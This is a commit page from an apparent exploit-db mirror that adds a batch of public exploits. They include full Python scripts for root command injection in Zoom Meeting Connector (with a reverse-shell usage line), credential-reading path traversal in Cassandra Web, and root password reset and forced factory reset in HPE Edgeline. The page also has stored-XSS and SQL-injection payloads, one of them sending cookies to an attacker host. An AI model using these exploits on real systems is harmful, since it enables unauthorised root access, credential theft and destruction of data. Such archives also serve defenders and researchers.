bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions

DB: 2021-01-06

Browse source 
19 changes to exploits/shellcodes

Intel(R) Matrix Storage Event Monitor x86 8.0.0.1039 - 'IAANTMON' Unquoted Service Path
Fluentd TD-agent plugin 4.0.1 - Insecure Folder Permission
IncomCMS 2.0 - Insecure File Upload
House Rental and Property Listing 1.0 - Multiple Stored XSS
Resumes Management and Job Application Website 1.0 - Authentication Bypass (Sql Injection)
WordPress Plugin Stripe Payments 2.0.39 - 'AcceptStripePayments-settings[currency_code]' Stored XSS
WordPress Plugin WP-Paginate 2.1.3 - 'preset' Stored XSS
Online Movie Streaming  1.0 - Authentication Bypass
Responsive ELearning System 1.0 - 'id' Sql Injection
Baby Care System 1.0 - 'Post title' Stored XSS
Responsive FileManager 9.13.4 - 'path' Path Traversal
Zoom Meeting Connector 4.6.239.20200613 - Remote Root Exploit (Authenticated)
HPE Edgeline Infrastructure Manager 1.0 - Multiple Remote Vulnerabilities
Cassandra Web 0.5.0 - Remote File Read
CSZ CMS 1.2.9 - Multiple Cross-Site Scripting
Online Learning Management System 1.0 - RCE (Authenticated)
Klog Server 2.4.1 - Command Injection (Unauthenticated)
EgavilanMedia User Registration & Login System with Admin Panel 1.0 - Multiple Stored Cross-Site Scripting
This commit is contained in:
Offensive Security 2021-01-06 05:01:59 +00:00
parent 8e0113decc
commit 2c7e8b1ddc
20 changed files with 1198 additions and 2 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

237
exploits/linux/webapps/49360.py Executable file
View file

@ -0,0 +1,237 @@
# Exploit Title: Zoom Meeting Connector 4.6.239.20200613 - Remote Root Exploit (Authenticated)
# Date: 12-29-2020
# Exploit Author: Jeremy Brown
# Vendor Homepage: https://support.zoom.us/hc/en-us/articles/201363093-Deploying-the-Meeting-Connector
# Software Link: https://support.zoom.us/hc/en-us/articles/201363093-Deploying-the-Meeting-Connector
# Version: 4.6.239.20200613
#!/usr/bin/python
# -*- coding: UTF-8 -*-
#
# zoomer.py
#
# Zoom Meeting Connector Post-auth Remote Root Exploit
#
# Jeremy Brown [jbrown3264/gmail]
# Dec 2020
#
# The Meeting Connector Web Console listens on port 5480. On the dashboard
# under Network -> Proxy, one can enable a proxy server. All of the fields
# are sanitized to a certain degree, even the developers noting in the proxy()
# function within backend\webconsole\WebConsole\net.py that they explicitly
# were concerned with command injection and attempted to prevent it:
#
# if ('"' in proxy_name) or ('"' in proxy_passwd): # " double quotes cannot be used to prevent shell injection
# is_valid = False
#
# It makes sense to leave some flexibility in the character limits here
# passwords are often expected to contain more than alphanumeric characters.
# But of course that means the Proxy Password field is still vulnerable to
# command injection with the ` character.
#
# The proxy data gets concatenated and written to /etc/profile.d/proxy.sh.
# Every three minutes, a task runs which executes this proxy script as root.
# After submission the dashboard says “The proxy will take effect after the
# server reboot!”, but the commands will still be executed within actually
# requiring a reboot. Keep in mind that the commands will be executed blind.
#
# For example, `id>/tmp/proxy_test` given as the Proxy Password will produce
# this in the /tmp/proxy_test file:
#
# uid=0(root) gid=0(root) groups=0(root) context=system_u:system_r:system_cronjob_t:s0-s0:c0.c1023
#
# MMR was tested, but Controller and VRC may also be vulnerable
#
# Usage
# > zoomer.py 10.0.0.10 admin xsecRET1 "sh -i >& /dev/udp/10.0.0.11/5555 0>&1"
# login succeeded
# command sent to server
#
# $ nc -u -lvp 5555
# ....
# sh: no job control in this shell
# sh-4.2# pwd
# /root
# sh-4.2#
#
# setenforce 0 if SELinux bothers you, service sshd start and add users/keys,
# check tokens in /opt/zoom/conf/register, check out the local environment, etc.
#
# Dependencies
# - pip install pyquery
#
# Fix
# Zoom says they've fixed this in the latest version
#
import os
import sys
import argparse
import requests
import urllib.parse
from pyquery import PyQuery
from requests.packages.urllib3.exceptions import InsecureRequestWarning
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
class Zoomer(object):
def __init__(self, args):
self.target = args.target
self.port = args.port
self.username = args.username
self.password = args.password
self.command = args.command
def run(self):
target = "https://" + self.target + ':' + str(self.port)
session = requests.Session()
session.verify = False
#
# get csrftoken from /login and use it to auth with creds
#
try:
resp = session.get(target + "/login")
except Exception as error:
print("Error: %s" % error)
return -1
try:
csrftoken = resp.headers['set-cookie'].split(';')[0]
except:
print("Error: couldn't parse csrftoken from response header")
return -1
csrfmiddlewaretoken = self.get_token(resp.text, 'csrfmiddlewaretoken')
if(csrfmiddlewaretoken == None):
return -1
data = \
{'csrfmiddlewaretoken':csrfmiddlewaretoken,
'name':self.username,
'password':self.password}
headers = \
{'Host':self.target + ':' + str(self.port),
'Referer':target,
'Cookie':csrftoken}
try:
resp = session.post(target + "/login", headers=headers, data=data)
except Exception as error:
print("Error: %s" % error)
return -1
if(resp.status_code != 200 or 'Wrong' in resp.text):
print("login failed")
return -1
else:
print("login succeeded")
#
# get csrfmiddlewaretoken from /network/proxy and post cmd
#
try:
resp = session.get(target + "/network/proxy")
except Exception as error:
print("Error: %s" % error)
return -1
csrfmiddlewaretoken = self.get_token(resp.text, 'csrfmiddlewaretoken')
cookies = session.cookies.get_dict()
#
# this happens with view-only users
#
if(len(cookies) < 2):
print("Error: failed to get session ID")
return -1
command = '`' + self.command + '`'
headers = \
{'Host':self.target + ':' + str(self.port),
'Referer':target,
'Cookie': \
'csrftoken=' + cookies['csrftoken'] + ';' + \
'sessionid=' + cookies['sessionid']}
data = \
{'csrfmiddlewaretoken':csrfmiddlewaretoken,
'proxyValue':1,
'proxyAddr':'localhost',
'proxyPort':8080,
'proxyName':'test',
'proxyPasswd':command}
try:
resp = session.post(target + "/network/proxy", headers=headers, data=data)
except Exception as error:
print("Error: %s" % error)
return -1
if(resp.status_code != 200):
print("something failed")
return -1
else:
print("command sent to server")
return 0
def get_token(self, body, name):
token = None
pq = PyQuery(body)
if(name == 'csrftoken'):
print("csrftoken")
if(name == 'csrfmiddlewaretoken'):
token = pq('input').attr('value')
return token
def arg_parse():
parser = argparse.ArgumentParser()
parser.add_argument("target",
type=str,
help="Zoom server")
parser.add_argument("-p",
"--port",
type=int,
default=5480,
help="Zoom port")
parser.add_argument("username",
type=str,
help="Valid username")
parser.add_argument("password",
type=str,
help="Valid password")
parser.add_argument("command",
type=str,
help="Command to execute (replace space with $IFS ?)")
args = parser.parse_args()
return args
def main():
args = arg_parse()
zm = Zoomer(args)
result = zm.run()
if(result > 0):
sys.exit(-1)
if(__name__ == '__main__'):
main()

141
exploits/linux/webapps/49362.py Executable file
View file

@ -0,0 +1,141 @@
# Exploit Title: Cassandra Web 0.5.0 - Remote File Read
# Date: 12-28-2020
# Exploit Author: Jeremy Brown
# Vendor Homepage: https://github.com/avalanche123/cassandra-web
# Software Link: https://rubygems.org/gems/cassandra-web/versions/0.5.0
# Version: 0.5.0
# Tested on: Linux
#!/usr/bin/python
# -*- coding: UTF-8 -*-
#
# cassmoney.py
#
# Cassandra Web 0.5.0 Remote File Read Exploit
#
# Jeremy Brown [jbrown3264/gmail]
# Dec 2020
#
# Cassandra Web is vulnerable to directory traversal due to the disabled
# Rack::Protection module. Apache Cassandra credentials are passed via the
# CLI in order for the server to auth to it and provide the web access, so
# they are also one thing that can be captured via the arbitrary file read.
#
# Usage
# > cassmoney.py 10.0.0.5 /etc/passwd
# root:x:0:0:root:/root:/bin/bash
# daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
# bin:x:2:2:bin:/bin:/usr/sbin/nologin
# ...
#
# > cassmoney.py 10.0.0.5 /proc/self/cmdline
# /usr/bin/ruby2.7/usr/local/bin/cassandra-web--usernameadmin--passwordP@ssw0rd
#
# (these creds are for auth to the running apache cassandra database server)
#
# Fix
# - fixed in github repo
# - v0.6.0 / ruby-gems when available
# (still recommended to containerize / run this in some sandbox, apparmor, etc)
#
import os
import sys
import argparse
import requests
import urllib.parse
SIGNATURE = 'cassandra.js'
#
# /var/lib/gems/2.7.0/gems/cassandra-web-0.5.0/app/public
#
DT = '../'
DT_NUM = 8
class CassMoney(object):
def __init__(self, args):
self.target = args.target
self.file = args.file
self.port = args.port
self.force = args.force
self.number = args.number
def run(self):
target = "http://" + self.target + ':' + str(self.port)
payload = urllib.parse.quote_plus(DT * self.number + self.file)
try:
deskpop = requests.get(target)
except Exception as error:
print("Error: %s" % error)
return -1
if(SIGNATURE not in deskpop.text and self.force == False):
print("Target doesn't look like Cassandra Web, aborting...")
return -1
try:
req = requests.get(target + '/' + payload)
except:
print("Failed to read %s (perm denied likely)" % self.file)
return -1
if(SIGNATURE in req.text):
print("Failed to read %s (bad path?)" % self.file)
return -1
if(len(req.text) == 0):
print("Server returned nothing for some reason")
return 0
print("\n%s" % req.text)
return 0
def arg_parse():
parser = argparse.ArgumentParser()
parser.add_argument("target",
type=str,
help="Cassandra Web Host")
parser.add_argument("file",
type=str,
help="eg. /etc/passwd, /proc/sched_debug + /proc/<cass-web-pid>/cmdline")
parser.add_argument("-p",
"--port",
type=int,
default=3000,
help="Cassandra Web Port")
parser.add_argument("-f",
"--force",
default=False,
action='store_true',
help="Run the payload even if server isn't Cassandra Web")
parser.add_argument("-n",
"--number",
type=int,
default=DT_NUM,
help="Adjust the number of dot-dot-slash")
args = parser.parse_args()
return args
def main():
args = arg_parse()
cm = CassMoney(args)
result = cm.run()
if(result > 0):
sys.exit(-1)
if(__name__ == '__main__'):
main()

22
exploits/multiple/webapps/49351.html Normal file
View file

@ -0,0 +1,22 @@
# Exploit Title: IncomCMS 2.0 - Insecure File Upload
# Google Dork: intext:"Incom CMS 2.0"
# Date: 07.12.2020
# Exploit Author: MoeAlBarbari
# Vendor Homepage: https://www.incomcms.com/
# Version: 2.0
# Tested on: BackBox linux
# CVE: CVE-2020-29597
<!DOCTYPE html>
<html>
<head>
<title>Upload your files</title>
</head>
<body>
<form enctype="multipart/form-data" action="http://www.example.com/incom/modules/uploader/showcase/script.php" method="POST">
<p>Upload your file</p>
<input type="file" name="Filedata"></input><br />
<input type="submit" value="Upload"></input>
</form>
</body>
</html>

218
exploits/multiple/webapps/49361.py Executable file
View file

@ -0,0 +1,218 @@
# Exploit Title: HPE Edgeline Infrastructure Manager 1.0 - Multiple Remote Vulnerabilities
# Date: 12-28-2020
# Exploit Author: Jeremy Brown
# Vendor Homepage: https://support.hpe.com/hpsc/swd/public/detail?swItemId=MTX_f62aaafe780a496dad6d28621a
# Software Link: https://support.hpe.com/hpsc/swd/public/detail?swItemId=MTX_f62aaafe780a496dad6d28621a
# Version: 1.0
#!/usr/bin/python
# -*- coding: UTF-8 -*-
#
# billhader.py
#
# HPE Edgeline Infrastructure Manager Multiple Remote Vulnerabilities
#
# Jeremy Brown [jbrown3264/gmail]
# Dec 2020
#
# In \opt\hpe\eim\containers\api\eim\api\urls.py, some private paths are defined
# which are intended to only be accessible via the local console.
#
# path('private/AdminPassReset', views.admin_password_reset), <-- ice
# path('private/ResetAppliance', views.reset_appliance), <-- ice
# path('private/EIMApplianceIP', views.get_eim_appliance_ips), <-- boring
#
# These are meant to only be exposed for the local GUI so admins can perform
# functions without authenticating. The way do they do this is by checking the
# Host header and returning a 404 not found for not-localhost, but 200 OK for
# 127.0.0.1. This is of course flawed because any remote user has control over
# the Host header and they can call these functions with valid JSON, eg.
# /private/AdminPassReset to reset the admin password and login via SSH (default)
# as root due to the Administrator and root always synced to the same password.
# They can also call ResetAppliance and the appliance will immediately reset
# user data and cause the entire server to reboot.
#
# Administrator is the default and permanent web console user and as mentioned it's
# tied to the root OS user account. When Administrator changes their password, the
# backend changes the root password to the same. Other users can be added to the
# web console, but there is nothing stopping them changing any other users password.
# Not even sure if this is a bug or just wow functionality because although the
# users appear different, they all seem to share the same role. Broken or incomplete
# design I guess. So any user can change the Administrator password and use it to
# login as root via the default open SSH server, start setting up camp, etc.
#
# Usage examples
# > billhader.py 10.0.0.10 pre_root_passwd -n letmein
# {"RootPasswd": "Modified", "UserPassword": "Modified"}
#
# > ssh root@10.0.0.10
# root@10.10.10.20's password: [letmein]
# [root@hpe-eim ~]#
#
# > billhader.py 10.0.0.10 post_root_passwd -u test -p abc123
# login succeeded
# {"Status": "success", "Valid_Entries": ["Password"], "Invalid_Entries": []}
#
# (root password is now newpassword default of 'letmein')
#
# > billhader.py 10.10.10.20 pre_factory_reset
# Lost your password huh? Are you sure you want to factory reset this server?
# yes
# done
#
import os
import sys
import argparse
import requests
import urllib.parse
import json
from requests.packages.urllib3.exceptions import InsecureRequestWarning
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
BINGO = '127.0.0.1' # not localhost :')
DEFAULT_PORT = 443
class BillHader(object):
def __init__(self, args):
self.target = args.target
self.action = args.action
self.newpassword = args.newpassword
self.username = args.username
self.password = args.password
def run(self):
target = "https://" + self.target + ':' + str(DEFAULT_PORT)
session = requests.Session()
session.verify = False
if(self.action == 'pre_root_passwd'):
headers = {'Host':BINGO}
data = \
{'Password':self.newpassword,
'ConfirmPassword':self.newpassword}
try:
resp = session.post(target + "/private/AdminPassReset",
headers=headers,
data=json.dumps(data))
except Exception as error:
print("Error: %s" % error)
return -1
print("%s" % resp.text)
if(self.action == 'post_root_passwd'):
data = \
{'UserName':self.username,
'Password':self.password}
try:
resp = session.post(target + "/redfish/v1/SessionService/Sessions",
data=json.dumps(data))
except Exception as error:
print("Error: %s" % error)
return -1
if(resp.status_code != 201):
print("login failed")
return -1
else:
print("login succeeded")
try:
token = resp.headers['x-auth-token']
except:
print("Error: couldn't parse token from response header")
return -1
if(token == None):
print("Error: couldn't parse token from session")
return -1
headers = {'X-Auth-Token':token}
data = {'Password':self.newpassword}
try:
resp = session.patch(target + "/redfish/v1/AccountService/Accounts/1",
headers=headers,
data=json.dumps(data))
except Exception as error:
print("Error: %s" % error)
return -1
print("%s" % resp.text)
if(self.action == 'pre_factory_reset'):
print("Lost your password huh? Are you sure you want to factory reset this server?")
choice = input().lower()
if('yes' not in choice):
print("cool, exiting")
return -1
headers = {'Host':BINGO}
data = {'ResetRequired':'true'}
try:
resp = session.post(target + "/private/ResetAppliance", \
headers=headers,
data=json.dumps(data))
except Exception as error:
print("Error: %s" % error)
return -1
print("done")
return 0
def arg_parse():
parser = argparse.ArgumentParser()
parser.add_argument("target",
type=str,
help="EIM host")
parser.add_argument("action",
type=str,
choices=['pre_root_passwd', 'post_root_passwd', 'pre_factory_reset'],
help="Which action to perform on the server")
parser.add_argument("-n",
"--newpassword",
type=str,
default="letmein",
help="New password to set for root account (letmein)")
parser.add_argument("-u",
"--username",
type=str,
help="Valid username (for post_root_reset)")
parser.add_argument("-p",
"--password",
type=str,
help="Valid password (for post_root_reset)")
args = parser.parse_args()
return args
def main():
args = arg_parse()
bill = BillHader(args)
result = bill.run()
if(result > 0):
sys.exit(-1)
if(__name__ == '__main__'):
main()

37
exploits/multiple/webapps/49367.txt Normal file
View file

@ -0,0 +1,37 @@
# Exploit Title: EgavilanMedia User Registration & Login System with Admin Panel 1.0 - Multiple Stored Cross-Site Scripting
# Date: 30-12-2020
# Exploit Author: Mesut Cetin
# Vendor Homepage: http://egavilanmedia.com
# Version: 1.0
# Tested on Windows 10, Firefox 83.0, Burp Suite Professional v1.7.34
Vulnerable parameter: email, gender, username
Payload: <script>alert(document.cookie)</script>
Proof of Concept:
To bypass client-side filter, we will use Burp Suite. Reproduce the vulnerability by following the steps:
1. Login with default credentials "admin:password" at the demo page at: http://demo.egavilanmedia.com/User%20Registration%20and%20Login%20System%20With%20Admin%20Panel/profile.php
2. Click above right on the "Profile" tab
3. Navigate to the "Edit Profile" tab
4. In Firefox, use Foxyproxy and click on "Intercept" within Burp Suite. Press on "Update password" button at demo page.
5. Capture the POST request in Burp Suite and manipulate the parameter as shown:
POST /User%20Registration%20and%20Login%20System%20With%20Admin%20Panel/admin/profile_action.php HTTP/1.1
Host: demo.egavilanmedia.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko)
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: de,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 180
Origin: http://demo.egavilanmedia.com
Connection: close
Referer: http://demo.egavilanmedia.com/User%20Registration%20and%20Login%20System%20With%20Admin%20Panel/admin/profile.php
Cookie: PHPSESSID=944b2es2eb67f971af305b2105e35c3e
fullname=admin&username=<script>alert(document.cookie)</script>&email=<script>alert('PoC 2')</script>&gender==<script>alert('PoC 3')</script>&action=update_admin
6. Forward the request and refresh the page. You'll receive three different XSS pop-ups. One of them contains the PHPSESSID cookie. By using payloads like <BODY ONLOAD=fetch(`http://attackers-page.com/${document.cookie}`)>, the session cookies can be send to the attacker.

3
exploits/php/webapps/48826.txt
View file

@ -1,12 +1,11 @@
# Exploit Title: Flatpress Add Blog 1.0.3 - Persistent Cross-Site Scripting
# Google Dork: -
# Date: 2020-09-19
# Exploit Author: Alperen Ergel
# Vendor Homepage: https://www.flatpress.org/
# Software Link: https://github.com/evacchi/flatpress/releases/tag/v1.0.3
# Version: 1.0.3
# Tested on: windows 10 / xampp
# CVE : -
# CVE : CVE-2020-35241
# Proof Of Content

17
exploits/php/webapps/49352.txt Normal file
View file

@ -0,0 +1,17 @@
# Exploit Title: House Rental and Property Listing 1.0 - Multiple Stored XSS
# Tested on: Windows 10
# Exploit Author: Mohamed habib Smidi (Craniums)
# Date: 2020-12-28
# Google Dork: N/A
# Vendor Homepage: https://www.sourcecodester.com/php/14649/house-rental-and-property-listing-php-full-source-code.html
# Software Link: https://www.sourcecodester.com/download-code?nid=14649&title=House+Rental+and+Property+Listing+in+PHP+with+Full+Source+Code
# Affected Version: Version 1
# Patched Version: Unpatched
# Category: Web Application
Step 1: Create a new user then login
Step 2: Click on "Register" page to register a room.
Step 3: input "<script>alert("Full name")</script>" in all fields each one with the field name except phone number, alternate number.
Note: for the email address you can inspect elements and change the type from email to text.
Step 4: Once all fields are completed, Click on Submit
Step 5: From the home page click on Details/Update, This will trigger all Stored XSS payloads one after the other.

11
exploits/php/webapps/49353.txt Normal file
View file

@ -0,0 +1,11 @@
# Exploit Title: Resumes Management and Job Application Website 1.0 - Authentication Bypass (Sql Injection)
# Date: 2020-12-27
# Exploit Author: Kshitiz Raj (manitorpotterk)
# Vendor Homepage: http://egavilanmedia.com
# Software Link: https://egavilanmedia.com/resumes-management-and-job-application-website/
# Version: 1.0
# Tested on: Windows 10/Kali Linux
Step 1 - Go to url http://localhost/Resumes/login.html
Step 2 - Enter Username :- ' or '1'='1'#
Step 3 - Enter Password - anything

48
exploits/php/webapps/49354.txt Normal file
View file

@ -0,0 +1,48 @@
# Exploit Title: WordPress Plugin Stripe Payments 2.0.39 - 'AcceptStripePayments-settings[currency_code]' Stored XSS
# Date: 04-01-2021
# Software Link: https://wordpress.org/plugins/stripe-payments/#developers
# Exploit Author: Park Won Seok
# Contact: kkigg39@gmail.com
# Category: Webapps
# Version: stripe-payments (Ver_2.0.39)
# Tested on: Windows 10 x64
# description:
# A Stored Cross-site scripting (XSS) was discovered in wordpress plugins stripe-payments (Ver_2.0.39)
# Vulnerability parameters : "AcceptStripePayments-settings[currency_code]" have Cross-Site Scripting.
# POC - Stored Cross-Site Scripting
POST /wp-admin/options.php HTTP/1.1
Host: localhost
Content-Length: 5786
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http:// localhost
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36
Accept:
text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer:
http://192.168.31.131/wp-admin/edit.php?post_type=asp-products&page=stripe-payments-settings
Accept-Encoding: gzip, deflate
Accept-Language: ko,en-US;q=0.9,en;q=0.8
Cookie:
wordpress_5b1d7751a3da8a97505638936b7963ae=root%7C1609074082%7C6vGILxkmE1tZmBRmymy2iwNfvpGntlQfhEhwVLDGHFu%7C50b0c8ba4dcc6dfdd756418c9fc960d3736f93a0febf165408110ea815dbab03;
wordpress_test_cookie=WP%20Cookie%20check;
wordpress_logged_in_5b1d7751a3da8a97505638936b7963ae=root%7C1609074082%7C6vGILxkmE1tZmBRmymy2iwNfvpGntlQfhEhwVLDGHFu%7Cb3e517e751d2519dc5473f911230fe31c966c9c755f193344b4bdea80a09d8b4;
asp_transient_id=36985e31f4be2b5ae0e14586c592c87d;
wp-settings-1=mfold%3Do%26editor%3Dhtml%26posts_list_mode%3Dlist;
wp-settings-time-1=1608903490
Connection: close
wp-asp-urlHash=general&option_page=AcceptStripePayments-settings-group&action=update&_wpnonce=eee296fed3&_wp_http_referer=%2Fwp-admin%2Fedit.php%3Fpost_type%3Dasp-products%26page%3Dstripe-payments-settings&AcceptStripePayments-settings%5Bcheckout_url%5D=http%3A%2F%2F192.168.31.131%2Fstripe-checkout-result%2F&asp_products_page_url_value=http%3A%2F%2F192.168.31.131%2Fproducts%2F&
*AcceptStripePayments-settings%5Bcurrency_code%5D=USDjk9v0%22%3e%3cscript%3ealert(document.cookie)%3c%2fscript%3edr45t*
&AcceptStripePayments-settings%5Bcurrency_symbol%5D=%24&AcceptStripePayments-settings%5Bbutton_text%5D=Buy+Now&AcceptStripePayments-settings%5Bpopup_button_text%5D=Pay+%25s&AcceptStripePayments-settings%5Bcheckout_lang%5D=&AcceptStripePayments-settings%5Bpopup_default_country%5D=0&AcceptStripePayments-settings%5Bapi_publishable_key%5D=1&AcceptStripePayments-settings%5Bapi_secret_key%5D=2&AcceptStripePayments-settings%5Bapi_publishable_key_test%5D=3&AcceptStripePayments-settings%5Bapi_secret_key_test%5D=4&AcceptStripePayments-settings%5Bbuyer_email_type%5D=text&AcceptStripePayments-settings%5Bfrom_email_address%5D=test+%3Csales%
40your-domain.com
%3E&AcceptStripePayments-settings%5Bbuyer_email_subject%5D=Thank+you+for+the+purchase&AcceptStripePayments-settings%5Bbuyer_email_body%5D=Hello%0D%0A%0D%0AThank+you+for+your+purchase%21+You+ordered+the+following+item%28s%29%3A%0D%0A%0D%0A%7Bproduct_details%7D&AcceptStripePayments-settings%5Bseller_notification_email%5D=localhost%
40google.com <http://40naver.com/>
&AcceptStripePayments-settings%5Bseller_email_type%5D=text&AcceptStripePayments-settings%5Bseller_email_subject%5D=Notification+of+product+sale&AcceptStripePayments-settings%5Bseller_email_body%5D=Dear+Seller%0D%0A%0D%0AThis+mail+is+to+notify+you+of+a+product+sale.%0D%0A%0D%0A%7Bproduct_details%7D%0D%0A%0D%0AThe+sale+was+made+to+%7Bpayer_email%7D%0D%0A%0D%0AThanks&AcceptStripePayments-settings%5Bsend_email_on_error_to%5D=localhost%
40google.com <http://40naver.com/>
&AcceptStripePayments-settings%5Bprice_currency_pos%5D=left&AcceptStripePayments-settings%5Bprice_decimal_sep%5D=.&AcceptStripePayments-settings%5Bprice_thousand_sep%5D=%2C&AcceptStripePayments-settings%5Bprice_decimals_num%5D=2&AcceptStripePayments-settings%5Bcustom_field_name%5D=&AcceptStripePayments-settings%5Bcustom_field_descr%5D=&AcceptStripePayments-settings%5Bcustom_field_descr_location%5D=placeholder&AcceptStripePayments-settings%5Bcustom_field_position%5D=above&AcceptStripePayments-settings%5Bcustom_field_type%5D=text&AcceptStripePayments-settings%5Bcustom_field_validation%5D=&AcceptStripePayments-settings%5Bcustom_field_custom_validation_regex%5D=&AcceptStripePayments-settings%5Bcustom_field_custom_validation_err_msg%5D=Please+enter+valid+data&AcceptStripePayments-settings%5Btos_text%5D=I+accept+the+%3Ca+href%3D%22https%3A%2F%2Fexample.com%2Fterms-and-conditions%2F%22+target%3D%22_blank%22%3ETerms+and+Conditions%3C%2Fa%3E&AcceptStripePayments-settings%5Btos_position%5D=above&AcceptStripePayments-settings%5Ballowed_currencies%5D%5BUSD%5D=1&AcceptStripePayments-settings%5Ballowed_currencies%5D%5BEUR%5D=1&AcceptStripePayments-settings%5Ballowed_currencies%5D%5BGBP%5D=1&AcceptStripePayments-settings%5Ballowed_currencies%5D%5BAUD%5D=1&AcceptStripePayments-settings%5Ballowed_currencies%5D%5BARS%5D=1&AcceptStripePayments-settings%5Ballowed_currencies%5D%5BBAM%5D=1&AcceptStripePayments-settings%5Ballowed_currencies%5D%5BBGN%5D=1&AcceptStripePayments-settings%5Ballowed_currencies%5D%5BBRL%5D=1&AcceptStripePayments-settings%5Ballowed_currencies%5D%5BCAD%5D=1&AcceptStripePayments-settings%5Ballowed_currencies%5D%5BCLP%5D=1&AcceptStripePayments-settings%5Ballowed_currencies%5D%5BCNY%5D=1&AcceptStripePayments-settings%5Ballowed_currencies%5D%5BCOP%5D=1&AcceptStripePayments-settings%5Ballowed_currencies%5D%5BCZK%5D=1&AcceptStripePayments-settings%5Ballowed_currencies%5D%5BDKK%5D=1&AcceptStripePayments-settings%5Ballowed_currencies%5D%5BEGP%5D=1&AcceptStripePayments-settings%5Ballowed_currencies%5D%5BHKD%5D=1&AcceptStripePayments-settings%5Ballowed_currencies%5D%5BHUF%5D=1&AcceptStripePayments-settings%5Ballowed_currencies%5D%5BINR%5D=1&AcceptStripePayments-settings%5Ballowed_currencies%5D%5BIDR%5D=1&AcceptStripePayments-settings%5Ballowed_currencies%5D%5BILS%5D=1&AcceptStripePayments-settings%5Ballowed_currencies%5D%5BJPY%5D=1&AcceptStripePayments-settings%5Ballowed_currencies%5D%5BLBP%5D=1&AcceptStripePayments-settings%5Ballowed_currencies%5D%5BMYR%5D=1&AcceptStripePayments-settings%5Ballowed_currencies%5D%5BMXN%5D=1&AcceptStripePayments-settings%5Ballowed_currencies%5D%5BNZD%5D=1&AcceptStripePayments-settings%5Ballowed_currencies%5D%5BNOK%5D=1&AcceptStripePayments-settings%5Ballowed_currencies%5D%5BPEN%5D=1&AcceptStripePayments-settings%5Ballowed_currencies%5D%5BPHP%5D=1&AcceptStripePayments-settings%5Ballowed_currencies%5D%5BPLN%5D=1&AcceptStripePayments-settings%5Ballowed_currencies%5D%5BRON%5D=1&AcceptStripePayments-settings%5Ballowed_currencies%5D%5BRUB%5D=1&AcceptStripePayments-settings%5Ballowed_currencies%5D%5BSAR%5D=1&AcceptStripePayments-settings%5Ballowed_currencies%5D%5BSGD%5D=1&AcceptStripePayments-settings%5Ballowed_currencies%5D%5BZAR%5D=1&AcceptStripePayments-settings%5Ballowed_currencies%5D%5BKRW%5D=1&AcceptStripePayments-settings%5Ballowed_currencies%5D%5BSEK%5D=1&AcceptStripePayments-settings%5Ballowed_currencies%5D%5BCHF%5D=1&AcceptStripePayments-settings%5Ballowed_currencies%5D%5BTWD%5D=1&AcceptStripePayments-settings%5Ballowed_currencies%5D%5BTHB%5D=1&AcceptStripePayments-settings%5Ballowed_currencies%5D%5BTRY%5D=1&AcceptStripePayments-settings%5Ballowed_currencies%5D%5BUYU%5D=1&AcceptStripePayments-settings%5Ballowed_currencies%5D%5BVND%5D=1&AcceptStripePayments-settings%5Bpp_additional_css%5D=&AcceptStripePayments-settings%5Brecaptcha_site_key%5D=&AcceptStripePayments-settings%5Brecaptcha_secret_key%5D=&submit=Save+Changes

42
exploits/php/webapps/49355.txt Normal file
View file

@ -0,0 +1,42 @@
# Exploit Title: WordPress Plugin WP-Paginate 2.1.3 - 'preset' Stored XSS
# Date: 04-01-2021
# Software Link: https://wordpress.org/plugins/wp-paginate/
# Exploit Author: Park Won Seok
# Contact: kkigg39@gmail.com
# Category: Webapps
# Version: WP-Paginate(Ver-2.1.3)
# CVE : N/A
# Tested on: Windows 10 x64
# description:
# A Stored Cross-site scripting (XSS) was discovered in wordpress plugins WP-Paginate(Ver_2.1.3)
# Vulnerability parameters : 2nd parameter "preset" have Stored-XSS.
# POC - Stored-XSS
POST /wp-admin/options-general.php?page=wp-paginate.php HTTP/1.1
Host: localhost
Content-Length: 348
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://localhost
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36
Accept:
text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://localhost/wp-admin/options-general.php?page=wp-paginate.php
Accept-Encoding: gzip, deflate
Accept-Language: ko,en-US;q=0.9,en;q=0.8
Cookie:
wordpress_5b1d7751a3da8a97505638936b7963ae=root%7C1609175102%7CsmSXDMcLQrRT6VE8KfGkKmVhXgpnCEAYtWIzvd91r78%7C94877ae306a5c59f9cdb81adc60a8cd6ad84e0e7551b18042ee0a33c9ab5cb31;
wordpress_test_cookie=WP%20Cookie%20check;
asp_transient_id=36985e31f4be2b5ae0e14586c592c87d;
wp-settings-1=mfold%3Do%26editor%3Dhtml%26posts_list_mode%3Dlist%26unfold%3D1;
wp-settings-time-1=1609001802;
wordpress_logged_in_5b1d7751a3da8a97505638936b7963ae=root%7C1609175102%7CsmSXDMcLQrRT6VE8KfGkKmVhXgpnCEAYtWIzvd91r78%7Cd570540f18447db0f0859be9e8e14bab64da22c8cf50fb8a80ebea73f188cb48
Connection: close
_wpnonce=8441c7c7b9&_wp_http_referer=%2Fwp-admin%2Foptions-general.php%3Fpage%3Dwp-paginate.php&title=Pages%3A&previouspage=%26laquo%3B&nextpage=%26raquo%3B&position=none&font=font-inherit&preset=default&
*preset='%3e%3cscript%3ealert(document.cookie)%3c%2fscript%3e*
